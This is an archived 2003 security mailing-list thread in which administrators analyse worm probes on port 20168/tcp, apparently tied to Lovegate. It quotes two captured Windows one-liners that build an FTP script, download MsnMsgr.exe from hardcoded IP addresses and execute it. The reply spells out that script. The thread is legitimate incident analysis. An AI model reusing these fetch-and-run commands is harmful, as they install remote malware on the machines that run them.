Security Incidents mailing list archives

FW: New Worm or Worm Variant?

From: "Bassett, Mark" <mbassett () omaha com>
Date: Thu, 11 Dec 2003 12:22:02 -0600


Looks to me like its building the wxtu.dll after it initializes
connection.  

And then it uses that built file as a command input to ftp.
So its doing ftp -n
 
With input from wxtu.dll which is below

open 211.26.130.118
USER noxe
Noxe
Binary
Get MsnMsgr.exe
bye

so it is just a simple ftp script to download an exploit.

Mark Bassett
Network Administrator
World media company
Omaha.com
402-898-2079


-----Original Message-----
From: Charles Hamby [mailto:fixer () gci net] 
Sent: Wednesday, December 10, 2003 1:36 PM
To: incidents () securityfocus com
Subject: New Worm or Worm Variant?

I've been seeing a jump in 20168/tcp scans over the past week or so.
This port is commonly associated with the Lovegate worm.  I recently set
up a port listener using Netcat to capture 
any output from probes against a couple of my systems.  Shown below are
the results:

echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
start MsnMsgr.Exe

echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
start MsnMsgr.Exe

At first glance it looks like some sort of non-interactive FTP session
to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up
empty (so this could be anything from a real .dll to a renamed
executable in my mind).  A couple of questions for the world at large:

1) Has anyone run across anything like this before?  This looks like
something automated to me.  Worm script, perhaps.  The IP I set up the
port listener on had roughly 20+ probes on 20168/tcp from noon yesterday
to 7am this morning.

2) Any theories on wxtu.dll?  Since I can't get a hold of the malware to
analyze it, I'm really guessing at this point.  MsnMsgr.Exe seems to be
the exploit itself, it it appears to be using something like FTPCOM to
do a non-interactive FTP session, but wxtu.dll could be anything from a
real .dll file to a renamed executable.  Ideas?

-cdh



------------------------------------------------------------------------
---
------------------------------------------------------------------------
----



************************************************************
Omaha World-Herald Company computer systems are for business use only.
This e-mail was scanned by MailSweeper
************************************************************


---------------------------------------------------------------------------
----------------------------------------------------------------------------

Current thread:

New Worm or Worm Variant? Charles Hamby (Dec 10)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)
  - Another New Worm or Worm Variant? David Gillett (Dec 11)
- Re: New Worm or Worm Variant? Juri Haberland (Dec 11)
- <Possible follow-ups>
- Re: New Worm or Worm Variant? Joris De Donder (Dec 11)
  - RE: New Worm or Worm Variant? Charles Hamby (Dec 11)
- FW: New Worm or Worm Variant? Bassett, Mark (Dec 11)